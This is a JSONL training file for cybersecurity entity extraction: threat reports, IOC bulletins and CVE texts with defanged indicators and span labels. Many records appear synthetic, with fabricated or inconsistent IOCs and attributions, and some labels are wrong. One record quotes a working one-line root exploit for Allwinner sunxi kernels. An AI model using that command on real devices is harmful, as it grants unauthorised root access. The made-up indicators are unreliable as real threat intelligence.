{"text": "Argo CD is a declarative continuous deployment for Kubernetes. Argo CD Cluster secrets might be managed declaratively using Argo CD / kubectl apply. As a result, the full secret body is stored in`kubectl[ . ]kubernetes[ . ]io/last-applied-configuration` annotation. pull request #7139 introduced the ability to manage cluster labels and annotations. Since clusters are stored as secrets it also exposes the `kubectl[ . ]kubernetes[ . ]io/last-applied-configuration` annotation which includes full secret body. In order to view the cluster annotations via the Argo CD API, the user must have `clusters, get` RBAC access. **Note:** In many cases, cluster secrets do not contain any actually-secret information. But sometimes, as in bearer-token auth, the contents might be very sensitive. The bug has been patched in versions 2.8.3, 2.7.14, and 2.6.15. Users are advised to upgrade. Users unable to upgrade should update/deploy cluster secret with `server-side-apply` flag which does not use or rely on `kubectl[ . ]kubernetes[ . ]io/last-applied-configuration` annotation. Note: annotation for existing secrets will require manual removal.", "spans": {"Indicator: kubectl.kubernetes.io": [[196, 225], [408, 437], [1002, 1031]], "System: Kubernetes": [[51, 61]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-40029"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at C:\\Users\\admin\\Downloads\\agent.py. Memory dump analysis confirmed execution of PowerShell Empire. Registry modifications pointed to persistence via /var/tmp/dropper.ps1. Network forensics identified connections to 88[.]10[.]230[.]69 and staticsync[ . ]dev. Email headers traced the initial vector to admin@login-portal[ . ]tech. File C:\\Users\\admin\\Downloads\\lsass.dmp (SHA1: ae3d16263e58bfa0a677b1ee6b210a0caf73630e) was identified as the initial dropper. A staging URL hxxps://staticgateway[.]info/wp-content/uploads/doc.php resolved to 172[.]11[.]177[.]42. Secondary artifact hash: SHA256: 2a7cd051324007715a838d9875881e215d18022c00bd5dd9943c6c2ebe78ce01.", "spans": {"Indicator: 88.10.230.69": [[306, 324]], "Indicator: staticsync.dev": [[329, 347]], "Indicator: admin@login-portal.tech": [[392, 419]], "Indicator: ae3d16263e58bfa0a677b1ee6b210a0caf73630e": [[468, 508]], "Indicator: https://staticgateway.info/wp-content/uploads/doc.php": [[563, 618]], "Indicator: 172.11.177.42": [[631, 650]], "Indicator: 2a7cd051324007715a838d9875881e215d18022c00bd5dd9943c6c2ebe78ce01": [[685, 749]]}, "info": {"id": "synth_v2_01139", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Recorded Future identified a large-scale phishing operation. Emails originated from notification@urgent-notice[ . ]online and billing@login-portal[ . ]tech, spoofing legitimate services. Victims were directed to hxxps://gateway-api[.]online/assets/js/payload.js which hosted a credential harvesting page on sync-mail[ . ]top. A secondary link hxxp://updatestorage[ . ]io/secure/token delivered WarmCookie (SHA1: 89580e72ffddd4a0d7785cdb8e836db32862c30a). The malware was saved to /etc/cron.d/ntds.dit and established C2 with 113[.]76[.]189[.]64.", "spans": {"Organization: Recorded Future": [[26, 41]], "Indicator: notification@urgent-notice.online": [[110, 147]], "Indicator: billing@login-portal.tech": [[152, 181]], "Indicator: hxxps://gateway-api.online/assets/js/payload.js": [[238, 287]], "Indicator: sync-mail.top": [[333, 350]], "Indicator: hxxp://updatestorage.io/secure/token": [[369, 409]], "Malware: WarmCookie": [[420, 430]], "Indicator: 89580e72ffddd4a0d7785cdb8e836db32862c30a": [[438, 478]], "Indicator: 113.76.189.64": [[551, 570]]}, "info": {"id": "synth_v2_01085", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: NjRAT (MD5: 0c4a37d206508e4ea364dcb3c2a826da). Upon execution on Atlassian Confluence, the sample creates C:\\Users\\Public\\Documents\\csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 20[.]255[.]157[.]190 every 60 seconds and DNS queries to gatewayupdate[ . ]com. The second stage was fetched from hxxps://storagesecure[ . ]club/download/update.exe and written to C:\\Users\\Public\\Documents\\taskhost.exe. The payload uses Nmap-style techniques for defense evasion. A secondary hash (SHA256: 242d7091d4af7d7070db8571e9b757ed39fcba7ea2cd3c208712e6e200a262f6) was extracted from the unpacked payload.", "spans": {"Malware: NjRAT": [[25, 30]], "Indicator: 0c4a37d206508e4ea364dcb3c2a826da": [[37, 69]], "System: Atlassian Confluence": [[90, 110]], "Indicator: 20.255.157.190": [[242, 262]], "Indicator: gatewayupdate.com": [[299, 320]], "Indicator: hxxps://storagesecure.club/download/update.exe": [[356, 406]], "Indicator: 242d7091d4af7d7070db8571e9b757ed39fcba7ea2cd3c208712e6e200a262f6": [[548, 612]]}, "info": {"id": "synth_v2_00626", "source": "defanged_augment"}}
{"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign . APT33 : 91[.]230[.]121[.]144 remserver[.]ddns[.]net . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"System: Android": [[41, 48]], "Organization: CTU": [[183, 186]], "Indicator: 91.230.121.144": [[306, 326]], "Indicator: remserver.ddns.net": [[327, 349]]}, "info": {"id": "cyberner_stix_train_000887", "source": "defanged_augment"}}
{"text": "Blog Post by ESET Research: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against Apache Struts deployments. The initial access vector involves spear-phishing emails from it@credential-check[ . ]site delivering BatLoader. Post-compromise, the attackers deploy QakBot and use CrackMapExec for reconnaissance. C2 infrastructure includes 172[.]39[.]4[.]118 and cache-api[ . ]org. A staging server at hxxps://datadata[.]online/download/update.exe hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\agent.py (MD5: a1ebfcac112d4eb9c509c4755348418a).", "spans": {"Organization: ESET Research": [[13, 26]], "Vulnerability: CVE-2020-24628": [[130, 144]], "System: Apache Struts": [[153, 166]], "Indicator: it@credential-check.site": [[242, 270]], "Malware: BatLoader": [[282, 291]], "Malware: QakBot": [[331, 337]], "Indicator: 172.39.4.118": [[406, 424]], "Indicator: cache-api.org": [[429, 446]], "Indicator: hxxps://datadata.online/download/update.exe": [[468, 513]], "Indicator: a1ebfcac112d4eb9c509c4755348418a": [[595, 627]]}, "info": {"id": "synth_v2_01630", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: IcedID (SHA256: eb94e503b38830cb04fcd556cef4a792ac8516422ecc34b5238ea5530052972f). Upon execution on Citrix NetScaler, the sample creates C:\\Windows\\Tasks\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 64 [ . ] 2 [ . ] 198 [ . ] 199 every 60 seconds and DNS queries to portal-cdn[ . ]info. The second stage was fetched from hxxp://data-storage[ . ]live/wp-content/uploads/doc.php and written to C:\\Users\\Public\\Documents\\config.dat. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (MD5: 3a74d18f311a4500832ee852e632e689) was extracted from the unpacked payload.", "spans": {"Malware: IcedID": [[25, 31]], "Indicator: eb94e503b38830cb04fcd556cef4a792ac8516422ecc34b5238ea5530052972f": [[41, 105]], "System: Citrix NetScaler": [[126, 142]], "Indicator: 64.2.198.199": [[268, 298]], "Indicator: portal-cdn.info": [[335, 354]], "Indicator: http://data-storage.live/wp-content/uploads/doc.php": [[390, 445]], "Indicator: 3a74d18f311a4500832ee852e632e689": [[590, 622]]}, "info": {"id": "synth_v2_00579", "source": "defanged_augment"}}
{"text": "IOC Bulletin - BlackCat Campaign:\nNetwork Indicators:\n- 172[.]63[.]16[.]146\n- 10[.]177[.]152[.]136\n- 182[.]229[.]111[.]235\n- relayproxy[.]cc\n- cloudcache[ . ]link\nURLs:\n- hxxps://sync-storage[ . ]top/wp-content/uploads/doc.php\n- hxxp://mail-api[.]io/gate.php\nEmail Senders:\n- noreply@login-portal[.]tech\n- account@account-update[ . ]xyz\nFile Indicators:\n- SHA1: b565ee4b18d6ae432adbc4a3beb7a995a14568b6\n- SHA1: 70bedfaf1bba22f050f537e73ef6af12c4410ee3\n- Drop path: C:\\Program Files\\Common Files\\backdoor.elf", "spans": {"Malware: BlackCat": [[15, 23]], "Indicator: 172.63.16.146": [[56, 75]], "Indicator: 10.177.152.136": [[78, 98]], "Indicator: 182.229.111.235": [[101, 122]], "Indicator: relayproxy.cc": [[125, 140]], "Indicator: cloudcache.link": [[143, 162]], "Indicator: https://sync-storage.top/wp-content/uploads/doc.php": [[171, 226]], "Indicator: hxxp://mail-api.io/gate.php": [[229, 258]], "Indicator: noreply@login-portal.tech": [[276, 303]], "Indicator: account@account-update.xyz": [[306, 336]], "Indicator: b565ee4b18d6ae432adbc4a3beb7a995a14568b6": [[362, 402]], "Indicator: 70bedfaf1bba22f050f537e73ef6af12c4410ee3": [[411, 451]]}, "info": {"id": "synth_v2_01354", "source": "defanged_augment"}}
{"text": "During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www[ . ]iphonedevsdk[ . ]com , which is an iPhone developers forum .", "spans": {"Indicator: www.iphonedevsdk.com": [[100, 128]]}, "info": {"id": "dnrti_train_002466", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Script.SWF.Cxx+.C173 SWF.Kit.Angler.G Exploit-SWF.x Bloodhound.Flash.31 SWF/Exploit.CVE-2015-3090.A SWF_EKSPLOYT.ED Swf.Packer.Angle-1 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Exploit.SWF.438 SWF_EKSPLOYT.ED BehavesLike.Flash.Exploit.kb EXP/CVE-2015-3090[.]AU Exploit:SWF/Netis.B Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 SWF.Win32.Script.800529 Exploit.SWF SWF/ExKit.AQ!exploit", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: CVE-2015-3090.AU": [[310, 328]]}, "info": {"id": "cyner2_train_002004", "source": "defanged_augment"}}
{"text": "Shamoon2 : 69[ . ]87[ . ]223[ . ]26:8080/p .", "spans": {"Malware: Shamoon2": [[0, 8]], "Indicator: 69.87.223.26:8080/p": [[11, 42]]}, "info": {"id": "cyberner_stix_train_001409", "source": "defanged_augment"}}
{"text": "Check Point Research detected a multi-stage attack chain. The initial phishing email from report@auth-check[ . ]org contained a link to hxxps://relaystorage[.]tech/login. This redirected to hxxp://cloudstorage[.]online/assets/js/payload.js on syncapi[ . ]tech. A secondary email from contact@identity-verify[ . ]cc pointed to hxxp://data-portal[.]live/wp-content/uploads/doc.php which delivered SmokeLoader. The final payload callback was hxxp://portal-api[.]info/portal/verify resolving to 192 [ . ] 140 [ . ] 80 [ . ] 246 via gateway-data[ . ]org.", "spans": {"Organization: Check Point Research": [[0, 20]], "Indicator: report@auth-check.org": [[90, 115]], "Indicator: hxxps://relaystorage.tech/login": [[136, 169]], "Indicator: http://cloudstorage.online/assets/js/payload.js": [[190, 239]], "Indicator: syncapi.tech": [[243, 259]], "Indicator: contact@identity-verify.cc": [[284, 314]], "Indicator: http://data-portal.live/wp-content/uploads/doc.php": [[326, 378]], "Malware: SmokeLoader": [[395, 406]], "Indicator: hxxp://portal-api.info/portal/verify": [[439, 477]], "Indicator: 192.140.80.246": [[491, 523]], "Indicator: gateway-data.org": [[528, 548]]}, "info": {"id": "synth_v2_01808", "source": "defanged_augment"}}
{"text": "IOCs C & C IP addresses : 155 [ . ] 133 [ . ] 82 [ . ] 181 155[.]133[.]82[.]240 155 [ . ] 133 [ . ] 82 [ . ] 244 185 [ . ] 234 [ . ] 218 [ . ] 59 195 [ . ] 22 [ . ] 126 [ . ] 160 195[.]22[.]126[.]163 195 [ . ] 22 [ . ] 126 [ . ] 80 195[.]22[.]126[.]81 5[.]45[.]73[.]24 5 [ . ] 45 [ . ] 74 [ . ] 130 IP addresses from which the Trojan was downloaded : 185 [ . ] 174 [ . ] 173 [ . ] 31 185[.]234[.]218[.]59 188[.]166[.]156[.]110 195[.]22[.]126[.]160 195 [ . ] 22 [ . ] 126 [ . ] 80 195[.]22[.]126[.]81 195 [ . ] 22 [ . ] 126 [ . ] 82 195 [ . ] 22 [ . ] 126 [ . ] 83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c 31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? It is possibly one of the most frequently asked questions on the Internet .", "spans": {"System: ARM": [[1348, 1351]], "System: Android": [[1399, 1406]], "Indicator: 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67": [[573, 637]], "Indicator: 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d": [[638, 702]], "Indicator: f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637": [[703, 767]], "Indicator: df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8": [[768, 832]], "Indicator: c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184": [[833, 897]], "Indicator: d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514": [[898, 962]], "Indicator: 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9": [[963, 1027]], "Indicator: 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c": [[1028, 1092]], "Indicator: 31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d": [[1093, 1157]], "Indicator: 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951": [[1158, 1222]], "Indicator: eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101": [[1223, 1287]], "Indicator: 155.133.82.181": [[26, 58]], "Indicator: 155.133.82.240": [[59, 79]], "Indicator: 155.133.82.244": [[80, 112]], "Indicator: 185.234.218.59": [[113, 145], [384, 404]], "Indicator: 195.22.126.160": [[146, 178], [427, 447]], "Indicator: 195.22.126.163": [[179, 199]], "Indicator: 195.22.126.80": [[200, 231], [448, 479]], "Indicator: 195.22.126.81": [[232, 251], [480, 499]], "Indicator: 5.45.73.24": [[252, 268]], "Indicator: 5.45.74.130": [[269, 298]], "Indicator: 185.174.173.31": [[351, 383]], "Indicator: 188.166.156.110": [[405, 426]], "Indicator: 195.22.126.82": [[500, 531]], "Indicator: 195.22.126.83": [[532, 563]]}, "info": {"id": "cyner2_train_001310", "source": "defanged_augment"}}
{"text": "CVE-2025-36568: Dell PowerProtect Data Domain BoostFS for client of Feature Release versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8.5, LTS2025 release version 8[.]3[.]1[.]0 through 8[.]3[.]1[.]20, LTS2024 release versions 7 [ . ] 13 [ . ] 1 [ . ] 0 through 7 [ . ] 13 [ . ] 1 [ . ] 50, contain an insufficiently protected credentials vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to credential exposure. The attacker may be able to use the exposed credentials to access the system with privileges of the compromised account.", "spans": {"Vulnerability: CVE-2025-36568": [[0, 14]], "Vulnerability: credential exposure": [[447, 466]], "Indicator: 7.7.1.0": [[93, 118]], "Indicator: 8.3.1.0": [[156, 169]], "Indicator: 8.3.1.20": [[178, 192]], "Indicator: 7.13.1.0": [[219, 245]], "Indicator: 7.13.1.50": [[254, 281]]}, "info": {"id": "nvd_2025_36568", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Qbot Campaign:\nNetwork Indicators:\n- 175 [ . ] 73 [ . ] 224 [ . ] 187\n- 192 [ . ] 117 [ . ] 67 [ . ] 218\n- 192 [ . ] 143 [ . ] 12 [ . ] 42\n- static-cloud[.]site\n- proxy-portal[.]net\nURLs:\n- hxxps://updatesync[.]com/assets/js/payload.js\n- hxxps://storagemail[.]net/download/update.exe\nEmail Senders:\n- confirm@identity-verify[ . ]cc\n- helpdesk@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 5cb18d679a4bf76b5a1e7a2f30dcb15a\n- MD5: 7f4f4c47383272809dca376dcf235946\n- Drop path: C:\\ProgramData\\taskhost.exe", "spans": {"Malware: Qbot": [[15, 19]], "Indicator: 175.73.224.187": [[52, 84]], "Indicator: 192.117.67.218": [[87, 119]], "Indicator: 192.143.12.42": [[122, 153]], "Indicator: static-cloud.site": [[156, 175]], "Indicator: proxy-portal.net": [[178, 196]], "Indicator: https://updatesync.com/assets/js/payload.js": [[205, 250]], "Indicator: hxxps://storagemail.net/download/update.exe": [[253, 298]], "Indicator: confirm@identity-verify.cc": [[316, 346]], "Indicator: helpdesk@urgent-notice.online": [[349, 382]], "Indicator: 5cb18d679a4bf76b5a1e7a2f30dcb15a": [[407, 439]], "Indicator: 7f4f4c47383272809dca376dcf235946": [[447, 479]]}, "info": {"id": "synth_v2_01406", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Mandiant identified a large-scale phishing operation. Emails originated from service@phishing-domain[ . ]com and alert@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://cache-api[.]com/panel/index.html which hosted a credential harvesting page on mailauth[.]xyz. A secondary link hxxp://cache-proxy[.]info/admin/config delivered XLoader (SHA1: 12fd8df0b48bbff062fe975ef441159baa9e569d). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe and established C2 with 212 [ . ] 51 [ . ] 62 [ . ] 11.", "spans": {"Organization: Mandiant": [[26, 34]], "Indicator: service@phishing-domain.com": [[103, 134]], "Indicator: alert@secure-verify.net": [[139, 166]], "Indicator: hxxp://cache-api.com/panel/index.html": [[223, 262]], "Indicator: mailauth.xyz": [[308, 322]], "Indicator: hxxp://cache-proxy.info/admin/config": [[341, 379]], "Malware: XLoader": [[390, 397]], "Indicator: 12fd8df0b48bbff062fe975ef441159baa9e569d": [[405, 445]], "Indicator: 212.51.62.11": [[542, 572]]}, "info": {"id": "synth_v2_00894", "source": "defanged_augment"}}
{"text": "Blog Post by INTERPOL: Tracking Ember Bear's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-23031 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from hr@document-share[.]link delivering SmokeLoader. Post-compromise, the attackers deploy Qbot and use Sliver for reconnaissance. C2 infrastructure includes 172 [ . ] 218 [ . ] 192 [ . ] 50 and backupportal[.]link. A staging server at hxxps://datadata[ . ]xyz/gate.php hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\helper.sh (MD5: 0eeb77513d93383a1d309b5599e37af6).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2021-23031": [[122, 136]], "System: MOVEit Transfer": [[145, 160]], "Indicator: hr@document-share.link": [[236, 260]], "Malware: SmokeLoader": [[272, 283]], "Malware: Qbot": [[323, 327]], "Indicator: 172.218.192.50": [[390, 422]], "Indicator: backupportal.link": [[427, 446]], "Indicator: https://datadata.xyz/gate.php": [[468, 501]], "Indicator: 0eeb77513d93383a1d309b5599e37af6": [[588, 620]]}, "info": {"id": "synth_v2_01537", "source": "defanged_augment"}}
{"text": "Artifact Analysis for AsyncRAT campaign:\nStage 1 dropper at C:\\Windows\\Temp\\beacon.dll - SHA1: b90b4560c9197981aa5a95c7348d5df888efd628\nStage 2 loader at /tmp/implant.so - SHA1: 1f6b4150b02a63eeff0296edd950b72f5e0ed9f9\nFinal payload at C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll - MD5: 83ed60a4a50bfe7ed5f0897654afd28c\nExfiltration module - SHA1: ba7b284bac5010da8cf97d47200fb08e9d8a705b\nAll stages communicated with 59[.]16[.]197[.]107. ADFind signatures detected in Stage 2.", "spans": {"Malware: AsyncRAT": [[22, 30]], "Indicator: b90b4560c9197981aa5a95c7348d5df888efd628": [[95, 135]], "Indicator: 1f6b4150b02a63eeff0296edd950b72f5e0ed9f9": [[178, 218]], "Indicator: 83ed60a4a50bfe7ed5f0897654afd28c": [[288, 320]], "Indicator: ba7b284bac5010da8cf97d47200fb08e9d8a705b": [[349, 389]], "Indicator: 59.16.197.107": [[419, 438]]}, "info": {"id": "synth_v2_01974", "source": "defanged_augment"}}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . The June 2017 sample of Clayslide contained the same OfficeServicesStatus[.]vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"Malware: Silence.Main Trojan": [[4, 23]], "Malware: Clayslide": [[153, 162]], "Indicator: OfficeServicesStatus.vbs file": [[182, 213]], "Malware: ISMAgent Clayslide document": [[227, 254]]}, "info": {"id": "cyberner_stix_train_005358", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Vidar Campaign:\nNetwork Indicators:\n- 10[.]247[.]19[.]146\n- 10 [ . ] 230 [ . ] 216 [ . ] 79\n- 20[.]247[.]238[.]195\n- login-login[ . ]top\n- edge-update[.]info\nURLs:\n- hxxp://backup-relay[ . ]io/gate.php\n- hxxp://loginstorage[.]live/assets/js/payload.js\nEmail Senders:\n- noreply@phishing-domain[ . ]com\n- report@auth-check[.]org\nFile Indicators:\n- SHA1: 988831c8980abdf6e5fe8c0421575ffdba5a5893\n- MD5: 7d59ef93027fadaa5f6407ea17cc3db5\n- Drop path: C:\\Users\\admin\\Downloads\\dropper.ps1", "spans": {"Malware: Vidar": [[15, 20]], "Indicator: 10.247.19.146": [[53, 72]], "Indicator: 10.230.216.79": [[75, 106]], "Indicator: 20.247.238.195": [[109, 129]], "Indicator: login-login.top": [[132, 151]], "Indicator: edge-update.info": [[154, 172]], "Indicator: hxxp://backup-relay.io/gate.php": [[181, 216]], "Indicator: hxxp://loginstorage.live/assets/js/payload.js": [[219, 266]], "Indicator: noreply@phishing-domain.com": [[284, 315]], "Indicator: report@auth-check.org": [[318, 341]], "Indicator: 988831c8980abdf6e5fe8c0421575ffdba5a5893": [[367, 407]], "Indicator: 7d59ef93027fadaa5f6407ea17cc3db5": [[415, 447]]}, "info": {"id": "synth_v2_01443", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Sharphound artifacts at /var/tmp/lsass.dmp. Memory dump analysis confirmed execution of Merlin. Registry modifications pointed to persistence via C:\\Users\\admin\\Desktop\\payload.bin. Network forensics identified connections to 10[.]31[.]227[.]96 and staticcdn[ . ]site. Email headers traced the initial vector to updates@phishing-domain[ . ]com. File C:\\Program Files\\Common Files\\shell.php (SHA256: b7f96c25122d971a30a6da7d828ac0491c59cec9826a9f2f8092c08610872b0a) was identified as the initial dropper. A staging URL hxxps://storage-auth[.]org/login resolved to 174 [ . ] 11 [ . ] 205 [ . ] 27. Secondary artifact hash: SHA256: c66646656e6293aceb4c06e63a13d5ed9ea0d2962b25fd3fd8025a12f242ac3b.", "spans": {"Indicator: 10.31.227.96": [[298, 316]], "Indicator: staticcdn.site": [[321, 339]], "Indicator: updates@phishing-domain.com": [[384, 415]], "Indicator: b7f96c25122d971a30a6da7d828ac0491c59cec9826a9f2f8092c08610872b0a": [[471, 535]], "Indicator: hxxps://storage-auth.org/login": [[590, 622]], "Indicator: 174.11.205.27": [[635, 666]], "Indicator: c66646656e6293aceb4c06e63a13d5ed9ea0d2962b25fd3fd8025a12f242ac3b": [[701, 765]]}, "info": {"id": "synth_v2_01266", "source": "defanged_augment"}}
{"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) . Outlaw : hxxp://www[.]minpop[.]com/sk12pack/idents.php Command and control . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"System: Android": [[256, 263]], "Organization: Allwinner": [[284, 293], [356, 365]], "System: ARM": [[294, 297]], "System: Linux": [[342, 347]], "System: Banana Pi micro-PCs": [[392, 411]], "System: Orange Pi": [[414, 423]], "Indicator: http://www.minpop.com/sk12pack/idents.php": [[671, 716]]}, "info": {"id": "cyberner_stix_train_001401", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from alert@secure-verify[.]net and confirm@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://nodebackup[ . ]dev/download/update.exe which hosted a credential harvesting page on cachemail[.]online. A secondary link hxxps://portalsync[.]club/collect delivered REvil (MD5: bd1f390128381e503e45e864a4199839). The malware was saved to /dev/shm/winlogon.exe and established C2 with 194[.]64[.]56[.]216.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: alert@secure-verify.net": [[99, 124]], "Indicator: confirm@document-share.link": [[129, 160]], "Indicator: https://nodebackup.dev/download/update.exe": [[217, 263]], "Indicator: cachemail.online": [[309, 327]], "Indicator: https://portalsync.club/collect": [[346, 379]], "Malware: REvil": [[390, 395]], "Indicator: bd1f390128381e503e45e864a4199839": [[402, 434]], "Indicator: 194.64.56.216": [[508, 527]]}, "info": {"id": "synth_v2_00890", "source": "defanged_augment"}}
{"text": "Mandiant observed APT29, also known as Cozy Bear, conducting phishing campaigns using Microsoft 365 tokens stolen from compromised organizations. The group deployed a new variant of SUNSHUTTLE malware communicating over HTTPS with domains hosted on Cloudflare infrastructure. Indicators included connections to the domain solartrackingsystem[.]net and IP address 185 [ . ] 220 [ . ] 101 [ . ] 34.", "spans": {"Organization: Mandiant": [[0, 8]], "System: Microsoft 365": [[86, 99]], "Malware: SUNSHUTTLE": [[182, 192]], "System: Cloudflare": [[249, 259]], "Indicator: solartrackingsystem.net": [[322, 347]], "Indicator: 185.220.101.34": [[363, 395]]}, "info": {"id": "mandiant_00035", "source": "defanged_augment"}}
{"text": "Blog Post by Volexity: Tracking APT29's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against Active Directory deployments. The initial access vector involves spear-phishing emails from verify@phishing-domain[ . ]com delivering SmokeLoader. Post-compromise, the attackers deploy AgentTesla and use SharpHound for reconnaissance. C2 infrastructure includes 127 [ . ] 84 [ . ] 161 [ . ] 27 and updatecache[ . ]site. A staging server at hxxp://relay-cdn[.]cc/wp-content/uploads/doc.php hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\lsass.dmp (SHA256: eefcdddac4d795c844e61cda7c36a1a9f36c063c111b779e2e4ed7e2e761816d).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2020-24628": [[117, 131]], "System: Active Directory": [[140, 156]], "Indicator: verify@phishing-domain.com": [[232, 262]], "Malware: SmokeLoader": [[274, 285]], "Malware: AgentTesla": [[325, 335]], "Indicator: 127.84.161.27": [[402, 433]], "Indicator: updatecache.site": [[438, 458]], "Indicator: http://relay-cdn.cc/wp-content/uploads/doc.php": [[480, 528]], "Indicator: eefcdddac4d795c844e61cda7c36a1a9f36c063c111b779e2e4ed7e2e761816d": [[614, 678]]}, "info": {"id": "synth_v2_01557", "source": "defanged_augment"}}
{"text": "Vulnerability in the Primavera P6 Enterprise Project Portfolio Management product of Oracle Construction and Engineering (component: Core). Supported versions that are affected are 16 [ . ] 2 [ . ] 0 [ . ] 0-16 [ . ] 2 [ . ] 19 [ . ] 0, 17 [ . ] 12 [ . ] 0 [ . ] 0-17 [ . ] 12 [ . ] 16 [ . ] 0, 18 [ . ] 8 [ . ] 0 [ . ] 0-18[.]8[.]16[.]0, 19[.]12[.]0[.]0 and 20 [ . ] 1 [ . ] 0 [ . ] 0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Primavera P6 Enterprise Project Portfolio Management executes to compromise Primavera P6 Enterprise Project Portfolio Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Primavera P6 Enterprise Project Portfolio Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Primavera P6 Enterprise Project Portfolio Management accessible data as well as unauthorized read access to a subset of Primavera P6 Enterprise Project Portfolio Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Primavera P6 Enterprise Project Portfolio Management. CVSS 3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L).", "spans": {"Indicator: 16.2.0.0": [[181, 207]], "Indicator: 16.2.19.0": [[208, 235]], "Indicator: 17.12.0.0": [[237, 264]], "Indicator: 17.12.16.0": [[265, 293]], "Indicator: 18.8.0.0": [[295, 321]], "Indicator: 18.8.16.0": [[322, 337]], "Indicator: 19.12.0.0": [[339, 354]], "Indicator: 20.1.0.0": [[359, 385]], "Organization: Oracle": [[85, 91]], "Vulnerability: denial of service": [[1212, 1229]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2556"}}
